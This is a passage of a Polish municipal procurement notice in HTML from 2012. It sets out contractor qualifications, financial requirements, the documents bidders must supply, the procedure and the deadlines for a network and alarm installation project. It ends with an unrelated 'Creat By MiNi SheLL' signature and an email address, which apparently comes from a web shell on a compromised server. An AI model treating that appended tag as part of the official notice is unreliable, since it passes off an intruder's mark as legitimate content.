f) minimum 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń zgodnie z ustawą z dnia 07 lipca 1994r. Prawo budowlane (t. j. Dz.U. z 2010, Nr 243, poz.1623 ze zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006r., Nr 83, poz. 578 ze zm.), albo odpowiadające im ważne uprawnienia budowlane, które zostały wydanej na podstawie wcześniej obowiązujących przepisów; 
g) minimum 2 osobami posiadającymi uprawnienia SEP (E i D) do eksploatacji i dozoru urządzeń, instalacji i sieci elektroenergetycznych do 1kV; 
h) minimum 1 osobą posiadającą licencję pracownika zabezpieczenia technicznego II stopnia; 
i) minimum 1 osobą posiadającą uprawnienia do projektowania systemów alarmowych (zgodne z klasą SA-4); 
j) minimum 1 osobą posiadającą uprawnienia do geodezyjnych pomiarów sytuacyjno-wysokościowych, realizacyjnych i inwentaryzacyjnych;
k) minimum 2 osobami posiadającymi certyfikaty wydane przez producenta oferowanego sprzętu potwierdzające odbycie szkolenia w zakresie implementacji rozwiązań routingu i swichingu na najwyższym z dostępnych poziomów,
l) minimum 2 osobami posiadającymi certyfikaty wydane przez producenta oferowanego sprzętu w zakresie bezpieczeństwa sieci na najwyższym z dostępnych poziomów,

Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo Budowlane (t. j. Dz. U.z 2010r., Nr 243, poz.1623 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2008 r. nr 63, poz. 394).
Ocena spełniania w/w warunku dokonana zostanie w oparciu o informacje zawarte w oświadczeniu wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Wykonawca wykaże się spełnieniem warunku dotyczącego sytuacji finansowej, jeżeli posiada zdolność kredytową lub wysokość posiadanych środków nie mniejszą niż 750 000,00 PLN. 
b)	Wykonawca wykaże się spełnieniem warunku dotyczącego sytuacji ekonomicznej jeżeli jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 3 000 000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zestawienie oferowanego sprzętu aktywnego wraz z kartami katalogowymi potwierdzającymi spełnianie przez oferowany sprzęt wymagań opisanych w opisie przedmiotu zamówienia</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Harmonogramy ofertowe przygotowane według wzorów załączonych do wzoru umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do zawartej umowy w przypadku wystąpienia okoliczności wymienionych w § 19 wzoru umowy, stanowiącego załącznik do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.ostrowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> j.w. oraz siedziba zamawiającego, Biuro Obsługi Interesanta, sala A, stanowisko 11
Zamawiający ustala termin wizji lokalnej terenu budowy w odniesieniu do pomieszczeń na dzień 07.02.2012r w godz 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2012 godzina 09:30, miejsce: siedziba zamawiającego, Biuro Obsługi Interesanta, sala A, stanowisko 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com